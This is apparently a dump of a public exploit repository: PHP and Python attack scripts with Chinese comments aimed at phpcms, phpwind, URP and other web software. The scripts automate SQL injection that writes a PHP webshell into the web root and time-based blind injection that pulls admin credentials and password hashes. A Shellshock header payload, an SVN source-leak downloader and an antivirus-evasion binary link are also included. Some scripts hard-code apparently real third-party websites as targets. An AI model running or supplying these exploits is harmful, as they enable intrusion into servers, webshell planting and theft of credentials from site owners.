 75 | while (!feof($ock)) {
 76 | $html.=fgets($ock);
 77 | }
 78 | }
 79 | else {
 80 | $html='';
 81 | while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
 82 | $html.=fread($ock,1);
 83 | }
 84 | }
 85 | fclose($ock);
 86 | }
 87 |  
 88 | $host=$argv[1];
 89 | $path=$argv[2];
 90 | $port=80;
 91 | $proxy="";
 92 | for ($i=3; $i<$argc; $i++){
 93 | $temp=$argv[$i][0].$argv[$i][1];
 94 | if ($temp=="-p")
 95 | {
 96 | $port=(int)str_replace("-p","",$argv[$i]);
 97 | }
 98 | if ($temp=="-P")
 99 | {
100 | $proxy=str_replace("-P","",$argv[$i]);
101 | }
102 | }
103 |  
104 | if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
105 | if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
106 |  
107 | function authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
108 |  
109 | $ckey_length = 4;
110 |  
111 | $key = md5($key ? $key : '');
112 | $keya = md5(substr($key, 0, 16));
113 | $keyb = md5(substr($key, 16, 16));
114 | $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
115 |  
116 | $cryptkey = $keya.md5($keya.$keyc);
117 | $key_length = strlen($cryptkey);
118 |  
119 | $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
120 | $string_length = strlen($string);
121 |  
122 | $result = '';
123 | $box = range(0, 255);
124 |  
125 | $rndkey = array();
126 | for($i = 0; $i <= 255; $i++) {
127 | $rndkey[$i] = ord($cryptkey[$i % $key_length]);
128 | }
129 |  
130 | for($j = $i = 0; $i < 256; $i++) {
131 | $j = ($j + $box[$i] + $rndkey[$i]) % 256;
132 | $tmp = $box[$i];
133 | $box[$i] = $box[$j];
134 | $box[$j] = $tmp;
135 | }
136 |  
137 | for($a = $j = $i = 0; $i < $string_length; $i++) {
138 | $a = ($a + 1) % 256;
139 | $j = ($j + $box[$a]) % 256;
140 | $tmp = $box[$a];
141 | $box[$a] = $box[$j];
142 | $box[$j] = $tmp;
143 | $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
144 | }
145 |  
146 | if($operation == 'DECODE') {
147 | if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
148 | return substr($result, 26);
149 | } else {
150 | return '';
151 | }
152 | } else {
153 | return $keyc.str_replace('=', '', base64_encode($result));
154 | }
155 |  
156 | }
157 |  
158 | $SQL = "time=999999999999999999999999&ids=1'&action=deleteuser";
159 | $SQL = urlencode(authcode($SQL, "ENCODE", ""));
160 | echo "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
161 | $packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
162 | $packet.="User-Agent: Mozilla/5.0\r\n";
163 | $packet.="Host: ".$host."\r\n";
164 | $packet.="Connection: Close\r\n\r\n";
165 | send($packet);
166 | if(strpos($html,"MySQL Errno") > 0){
167 | echo "[2] 发现存在SQL注入漏洞"."\n";
168 | echo "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n";
169 | $packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n";
170 | $packet.="User-Agent: Mozilla/5.0\r\n";
171 | $packet.="Host: ".$host."\r\n";
172 | $packet.="Connection: Close\r\n\r\n";
173 | send($packet);
174 | preg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches);
175 | //print_r($matches);
176 | if(!empty($matches)){
177 | echo "[4] 得到web路径 " . $matches[0]."\n";
178 | echo "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n";
179 | $SQL = "time=999999999999999999999999&ids=1)";
180 | $SQL.=" and 1=2 union select '' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#";
181 | $SQL.="&action=deleteuser";
182 | $SQL = urlencode(authcode($SQL, "ENCODE", ""));
183 | echo "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n";
184 | $packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n";
185 | $packet.="User-Agent: Mozilla/5.0\r\n";
186 | $packet.="Host: ".$host."\r\n";
187 | $packet.="Connection: Close\r\n\r\n";
188 | send($packet);
189 | if(strpos($html,"Access denied") > 0){
190 | echo "[-] MYSQL权限过低 禁止写入文件 :(";
191 | die;
192 | }
193 | echo "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n";
194 | $packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n";
195 | $packet.="User-Agent: Mozilla/5.0\r\n";
196 | $packet.="Host: ".$host."\r\n";
197 | $packet.="Connection: Close\r\n\r\n";
198 | send($packet);
199 | if(strpos($html,"phpinfo()") > 0){
200 | echo "[7] 测试phpinfo成功!shell密码是a ! enjoy it :)";
201 | }
202 | }else{
203 | echo "[-]未取到web路径 :(";
204 | }
205 | }else{
206 | echo "[*]不存在SQL注入漏洞"."\n";
207 | }
208 |  
209 | ?>
210 | 


--------------------------------------------------------------------------------
/phpcms/php authkey加密构成.php:
--------------------------------------------------------------------------------
 1 |  0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {
20 |                         return substr($result, 26);
21 |                 } else {
22 |                         return '';
23 |                 }
24 |         }
25 | }
26 | 
27 | echo sys_auth('i=3&d=1&t=9999999999&ip=115.238.245.179&m=3&modelid=3&s=caches/configs/system.p&f=hp', 'ENCODE', '8fafb9a1932b309d809e6140772c661');
28 | ?>
29 | 


--------------------------------------------------------------------------------
/phpweb/PHPWEB IIS网站管理系统后台Kedit编辑器漏洞利用代码.html:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/phpweb/PHPWEB IIS网站管理系统后台Kedit编辑器漏洞利用代码.html


--------------------------------------------------------------------------------
/phpwind/PHPWIND_exp.php:
--------------------------------------------------------------------------------
  1 |  126 ))
 37 |    {$result.="  .";}
 38 |    else
 39 |    {$result.="  ".$string[$i];}
 40 |    if (strlen(dechex(ord($string[$i])))==2)
 41 |    {$exa.=" ".dechex(ord($string[$i]));}
 42 |    else
 43 |    {$exa.=" 0".dechex(ord($string[$i]));}
 44 |    $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 45 |   }
 46 |  return $exa."\r\n".$result;
 47 | }
 48 | $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
 49 | 
 50 | function sendpacketii($packet)
 51 | {
 52 |   global $proxy, $host, $port, $html, $proxy_regex;
 53 |   if ($proxy=='') {
 54 |     $ock=fsockopen(gethostbyname($host),$port);
 55 |     if (!$ock) {
 56 |       echo 'No response from '.$host.':'.$port;
 57 |     }
 58 |   }
 59 |   else {
 60 | 	$c = preg_match($proxy_regex,$proxy);
 61 |     if (!$c) {
 62 |       echo 'Not a valid proxy...';die;
 63 |     }
 64 |     $parts=explode(':',$proxy);
 65 |     echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
 66 |     $ock=fsockopen($parts[0],$parts[1]);
 67 |     if (!$ock) {
 68 |       echo 'No response from proxy...';die;
 69 | 	}
 70 |   }
 71 |   fputs($ock,$packet);
 72 |   if ($proxy=='') {
 73 |     $html='';
 74 |     while (!feof($ock)) {
 75 |       $html.=fgets($ock);
 76 |     }
 77 |   }
 78 |   else {
 79 |     $html='';
 80 |     while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
 81 |       $html.=fread($ock,1);
 82 |     }
 83 |   }
 84 |   fclose($ock);
 85 | }
 86 | 
 87 | $host=$argv[1];
 88 | $path=$argv[2];
 89 | $port=80;
 90 | $proxy="";
 91 | for ($i=3; $i<$argc; $i++){
 92 | $temp=$argv[$i][0].$argv[$i][1];
 93 | if ($temp=="-p")
 94 | {
 95 |   $port=str_replace("-p","",$argv[$i]);
 96 | }
 97 | if ($temp=="-P")
 98 | {
 99 |   $proxy=str_replace("-P","",$argv[$i]);
100 | }
101 | }
102 | if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
103 | if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
104 | 
105 | echo "please wait...\n";
106 | 
107 | function StrCode($string,$action='ENCODE'){
108 | 	$key	= $GLOBALS['my_fragment'];
109 | 	$string	= $action == 'ENCODE' ? $string : base64_decode($string);
110 | 	$len	= 18;
111 | 	$code	= '';
112 | 	for($i=0; $i ".$cp."\n";
151 | 
152 | //see sql errors... you need a valid key for strcodeii() function,
153 | //so let's ask :)
154 | $tt="\t";for ($i=1; $i<=255; $i++){$tt.=chr($i);}
155 | while (1)
156 | {
157 |     $GLOBALS['my_fragment']=random(18);
158 |     $au=StrCode($tt,"ENCODE");
159 |     $packet ="GET ".$p."admin.php HTTP/1.0\r\n";
160 |     $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
161 |     $packet.="Host: ".$host."\r\n";
162 |     $packet.="Cookie: ".$cp."AdminUser=".$au.";\r\n";
163 |     $packet.="Accept: text/plain\r\n";
164 |     $packet.="Connection: Close\r\n\r\n";
165 |     sendpacketii($packet);
166 |     $html=html_entity_decode($html);
167 |     $html=str_replace("
","",$html);
168 |     if ((eregi("WHERE username='",$html)) and (eregi("You Can Get Help In",$html))){
169 |         $temp=explode("WHERE username='",$html);
170 |         $temp2=explode("'
",$temp[1]);
171 |         $decoded=$temp2[0];
172 |         if (strlen($decoded)==255) break;
173 |     }
174 | }
175 | 
176 | $decoded="\t".$decoded;
177 | $temp = $au;
178 | 
179 | //calculating key...
180 | $key="";
181 | for ($j=0; $j<18;  $j++){
182 |     for ($i=0; $i<255; $i++){
183 |         $aa="";
184 |         if ($j<>0){
185 |             for ($k=1; $k<=$j; $k++){
186 |                 $aa.="a";
187 |             }
188 |         }
189 |         $GLOBALS['my_fragment']=$aa.chr($i);
190 |         $t = StrCode($temp,"DECODE");
191 |         if ($t[$j]==$decoded[$j]){
192 |             $key.=chr($i);
193 |         }
194 |    }
195 | }
196 | 
197 | function is_my_key($fragment)
198 | {
199 |  if (ereg("^[a-f0-9]{18}",trim($fragment))) {return true;}
200 |  else {return false;}
201 | }
202 | 
203 | if (is_my_key($key)){
204 |     echo "encryption key ->".$key."\n";
205 |     $GLOBALS['my_fragment']=$key;
206 | }
207 | else
208 | {die("unable to retrieve the magic key...");}
209 | 
210 | $chars[0]=0;//null
211 | $chars=array_merge($chars,range(48,57)); //numbers
212 | $chars=array_merge($chars,range(97,102));//a-f letters
213 | $j=1;$password="";
214 | while (!strstr($password,chr(0)))
215 | {
216 |     for ($i=0; $i<=255; $i++)
217 |     {
218 |         if (in_array($i,$chars))
219 |         {
220 |             //you can use every char because of base64_decode()...so this bypass magic quotes...
221 |             $sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),benchmark(1000000,sha1(\"suntzu\")),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*";
222 |             echo "sql -> ".$sql."\n";
223 |             $packet ="GET ".$p."admin.php HTTP/1.0\r\n";
224 |             $packet.="CLIENT-IP: 1.2.3.4\r\n";
225 |             $packet.="Host: ".$host."\r\n";
226 |             $packet.="Cookie: ".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n";
227 |             $packet.="Accept: text/plain\r\n";
228 |             $packet.="Connection: Close\r\n\r\n";
229 |             $packet.=$data;
230 |             sendpacketii($packet);
231 |             usleep(2000000);
232 |             $starttime=time();
233 |             echo "starttime -> ".$starttime."\r\n";
234 |             sendpacketii($packet);
235 |             $endtime=time();
236 |             echo "endtime -> ".$endtime."\r\n";
237 |             $difftime=$endtime - $starttime;
238 |             echo "difftime -> ".$difftime."\r\n";
239 |             if ($difftime > 10) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
240 |         }
241 |         if ($i==255) {
242 |             die("\nExploit failed...");
243 |         }
244 |     }
245 | $j++;
246 | }
247 | 
248 | $j=1;$admin="";
249 | while (!strstr($admin,chr(0)))
250 | {
251 |     for ($i=0; $i<=255; $i++)
252 |     {
253 |             $sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(username,".$j.",1))=".$i."),benchmark(1000000,sha1(\"suntzu\")),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*";
254 |             echo "sql -> ".$sql."\n";
255 |             $packet ="GET ".$p."admin.php HTTP/1.0\r\n";
256 |             $packet.="CLIENT-IP: 1.2.3.4\r\n";
257 |             $packet.="Host: ".$host."\r\n";
258 |             $packet.="Cookie: ".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n";
259 |             $packet.="Accept: text/plain\r\n";
260 |             $packet.="Connection: Close\r\n\r\n";
261 |             $packet.=$data;
262 |             sendpacketii($packet);
263 |             usleep(2000000);
264 |             $starttime=time();
265 |             echo "starttime -> ".$starttime."\r\n";
266 |             sendpacketii($packet);
267 |             $endtime=time();
268 |             echo "endtime -> ".$endtime."\r\n";
269 |             $difftime=$endtime - $starttime;
270 |             echo "difftime -> ".$difftime."\r\n";
271 |             if ($difftime > 10) {$admin.=chr($i);echo "admin -> ".$admin."[???]\r\n";sleep(2);break;}
272 |         if ($i==255) {
273 |             die("\nExploit failed...");
274 |         }
275 |     }
276 | $j++;
277 | }
278 | 
279 | function is_hash($hash)
280 | {
281 |  if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
282 |  else {return false;}
283 | }
284 | 
285 | if (is_hash($password)) {
286 |     print_r('
287 | --------------------------------------------------------------------------------
288 | admin user     -> '.$admin.'
289 | pwd hash (md5) -> '.$password.'
290 | --------------------------------------------------------------------------------
291 | ');
292 | }
293 | else {
294 |    echo "exploit failed...";
295 | }
296 | ?>
297 | 
298 | 
299 | 


--------------------------------------------------------------------------------
/phpwind/phpwind 5.0.1 Sql注射漏洞利用程序.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/phpwind/phpwind 5.0.1 Sql注射漏洞利用程序.php


--------------------------------------------------------------------------------
/phpwind/phpwind5.x passport_client.php UPDATE SQL Injection POC.php:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/phpwind/phpwind5.x passport_client.php UPDATE SQL Injection POC.php


--------------------------------------------------------------------------------
/php包含和代码执行写一句话.txt:
--------------------------------------------------------------------------------
1 | ";?>
2 | 


--------------------------------------------------------------------------------
/shellshock.txt:
--------------------------------------------------------------------------------
 1 | User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id;
 2 | 
 3 | 
 4 | 会返回id
 5 | 
 6 | 
 7 | 
 8 | 测试:
 9 | 
10 | 
11 | curl -H 'User-Agent:() { :;  }; echo -e "\r\nVul\r\n"' http://example.com/some-cgi/script.cgi
12 | 


--------------------------------------------------------------------------------
/svn/svn.php:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/php -q
  2 | 
  3 | $type) {
142 | 
143 |         if($type=='dir') {
144 | 
145 |             debug(">>> 进入 $file 目录\n", ALL);
146 | 
147 |             svn_clone($url.'/'.$file); 
148 | 
149 |             debug("<<< 退出 $file 目录\n", ALL);
150 | 
151 |         } elseif($type=='file') {
152 | 
153 |             debug("*** 下载 $file 文件\n", ALL);
154 | 
155 |             fetch($url.'/.svn/text-base/'.$file.'.svn-base');
156 | 
157 |         }
158 | 
159 |     }
160 | 
161 | }
162 | 
163 | 
164 | 
165 | #抓取并保存
166 | 
167 | function fetch($text_base){
168 | 
169 |     put($text_base, get($text_base));
170 | 
171 | }
172 | 
173 | 
174 | 
175 | #带缓存的抓取
176 | 
177 | function get($url) {
178 | 
179 |     $file = CACHE_DIR.'/'.chunk_split(substr(md5($url),0,6),2,'/').urlencode($url);
180 | 
181 |     $dir = dirname($file);
182 | 
183 |     if(!is_dir($dir)) {
184 | 
185 |         mkdir($dir,0777,true);
186 | 
187 |     }
188 | 
189 |     if(!file_exists($file)) {
190 | 
191 |         $content = file_get_contents($url) or debug("读取 {$url} 内容为空\n", WARNING);
192 | 
193 |         if($content)
194 | 
195 |         {
196 | 
197 |             file_put_contents($file, $content) or debug("写入 {$file} 内容为空\n", WARNING);
198 | 
199 |         }
200 | 
201 |     } else {
202 | 
203 |         $content = file_get_contents($file) or debug("读缓存 {$file} 内容为空\n", WARNING);
204 | 
205 |     }
206 | 
207 |     return $content;
208 | 
209 | }
210 | 
211 | 
212 | 
213 | #保存到数据目录
214 | 
215 | function put($url, $content='')
216 | 
217 | {
218 | 
219 |     $file = DATA_DIR.substr(strchr($url,'://'),2);
220 | 
221 |     $dir  = dirname(dirname(dirname($file)));
222 | 
223 |     $file = basename($file,'.svn-base');
224 | 
225 |     #看看你那什么有多长?
226 | 
227 |     $len  = strlen($content);
228 | 
229 |     if(!is_dir($dir)) {
230 | 
231 |         mkdir($dir,0777,true);
232 | 
233 |     }
234 | 
235 |     debug("写入 $file 到 $dir ($len bytes)\n", ALL);
236 | 
237 |     file_put_contents($dir.'/'.$file, $content) or debug("写入 {$file} 内容为空\n", WARNING);
238 | 
239 | }
240 | 
241 | 
242 | 
243 | #打印调试信息
244 | 
245 | function debug($msg, $level=0) {
246 | 
247 |     #颜色定义 0:灰, 1:红, 2:绿, 3:黄, 4:蓝, 5:粉, 6:青, 7:白
248 | 
249 |     static $colors = array(NONE=>0, ERROR=>1, WARNING=>2, ALL=>3, EGGACHE=>4);
250 | 
251 |     VERBOSE>=$level && (USECOLOR?printf("\033[1;3{$colors[$level]}m$msg\033[m", $color, $msg):print $msg);
252 | 
253 | }
254 | 


--------------------------------------------------------------------------------
/urp/urp_upload.html:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 习科联创urp getshell利用工具
 4 | 
 5 | 
 6 | 
 7 | 

 8 |     
 9 |     
10 |     
11 |     
12 |     
13 |     
14 |     
15 |     
16 |     
17 |     
18 |         
19 | 
20 |             
21 |           
22 |           
30 |           
33 |         
34 |         
35 |           
36 |           
37 |           
40 |         
41 |         
42 |           
63 |         
64 |     
Word版本号
23 |             
29 |           
31 |             * 如果提交论文是Word类型,请选择版本号.
32 |           
  
38 |             * 如果提交论文是latex类型,请上传.zip文件
39 |           

43 |             
44 |               
45 |                 
60 |               
61 |             

46 |                   
                    请选择论文格式
47 |                     
48 |                     word
49 |                     
50 |                     latex
51 |                     
52 |                     pdf
53 |                                        
54 |                   

55 |                   
                    提交论文
56 |                    
57 |                     

58 |                   

59 |                 

62 |           

65 | 
66 |       
67 | 
68 | 

69 | 习科联创网络信息安全论坛

70 | zippo

71 | 习科联创官方qq群:152834264

72 | 
73 | 
74 | 
75 | 


--------------------------------------------------------------------------------
/二分法查找.py:
--------------------------------------------------------------------------------
 1 | import urllib
 2 | import urllib2
 3 | def doinject(payload):
 4 |     url = 'xxxxxxxxxxxxxxxxxxxxx'
 5 |     values = {'injection':payload,'inject':'Inject'}
 6 |     data = urllib.urlencode(values)
 7 |     #print data
 8 |     req = urllib2.Request(url, data)
 9 |     req.add_header('cookie','xx=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx')
10 |     response = urllib2.urlopen(req)
11 |     the_page = response.read()
12 |     if (the_page.find("Welcome back")>0):
13 |         return True
14 |     else:
15 |         return False
16 |     
17 | wordlist = "0123456789ABCDEF"
18 | res = ""
19 | for i in range(1,33):
20 |     s=0
21 |     t=15
22 |     while (s\''+wordlist[m]+'\' -- LanLan'):
32 |             s=m+1
33 |             print wordlist[s]+":"+wordlist[t]
34 |         else:
35 |             t=m
36 |             print wordlist[s]+":"+wordlist[t]
37 |     res = res+wordlist[m]
38 |     print res
39 | 


--------------------------------------------------------------------------------
/免杀360cve20144113/Win64.exe.lnk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/免杀360cve20144113/Win64.exe.lnk


--------------------------------------------------------------------------------
/免杀360cve20144113/win32.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/免杀360cve20144113/win32.exe


--------------------------------------------------------------------------------
/延迟注入.py:
--------------------------------------------------------------------------------
 1 | #encoding=utf-8
 2 | 
 3 | import httplib
 4 | 
 5 | import time
 6 | 
 7 | import string
 8 | 
 9 | import sys
10 | 
11 | import random
12 | 
13 | import urllib
14 | 
15 | headers = {
16 | 
17 |     'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
18 | 
19 | }
20 | 
21 | payloads = list(string.ascii_lowercase)
22 | 
23 | for i in range(0,10):
24 | 
25 |     payloads.append(str(i))
26 | 
27 | payloads += ['@','_', '.', '-', '\\', ' ']
28 | 
29 | print 'Try to retrive user:'
30 | 
31 | user = ''
32 | 
33 | for i in range(1,11):
34 | 
35 |     for payload in payloads:
36 | 
37 |         try:
38 | 
39 |             conn = httplib.HTTPConnection('www.h-h.com.cn', timeout=5)
40 | 
41 |             s = "if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:5' --" % (i, ord(payload))
42 | 
43 |             params = "id=74;" + urllib.quote(s)
44 | 
45 |             conn.request(method='GET', url= '/visa/view_visa.aspx?' + params,
46 | 
47 |                          headers = headers)
48 | 
49 |             html_doc = conn.getresponse().read()
50 | 
51 |             conn.close()
52 | 
53 |             print '+',
54 | 
55 |         except Exception, e:
56 | 
57 |             user += payload
58 | 
59 |             print '\n[*]', user
60 | 
61 |             break
62 | 
63 | print '\n[Done] User is:', user
64 | 


--------------------------------------------------------------------------------
/盲注.py:
--------------------------------------------------------------------------------
 1 | #encoding=utf-8
 2 | 
 3 | import time
 4 | 
 5 | import string
 6 | 
 7 | import sys
 8 | 
 9 | import random
10 | 
11 | import urllib
12 | 
13 | import urllib2
14 | 
15 | data={}
16 | 
17 | def http_conn(url):
18 | 
19 | 	url_test='http://web3.17500.cn/800/nr.php?id=27'+url#添加网址
20 | 
21 | 	req=urllib2.urlopen(url_test)
22 | 
23 | 	html_doc=req.read()
24 | 
25 | 	if html_doc.find('2010069')>0:
26 | 
27 | 		return True
28 | 
29 | 	else:
30 | 
31 | 		return False
32 | 
33 | database='c'
34 | 
35 | payloads=list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.')
36 | 
37 | for i in range(2,10,1):
38 | 
39 | 	for payload in payloads:
40 | 
41 | 		url=" and left(database(),%s)='%s' " % (i,(database+payload))
42 | 
43 | 		print url
44 | 
45 | 		if http_conn(url)==True:
46 | 
47 | 			database+=payload
48 | 
49 | 			print 'current database:'+database
50 | 
51 | 			break


--------------------------------------------------------------------------------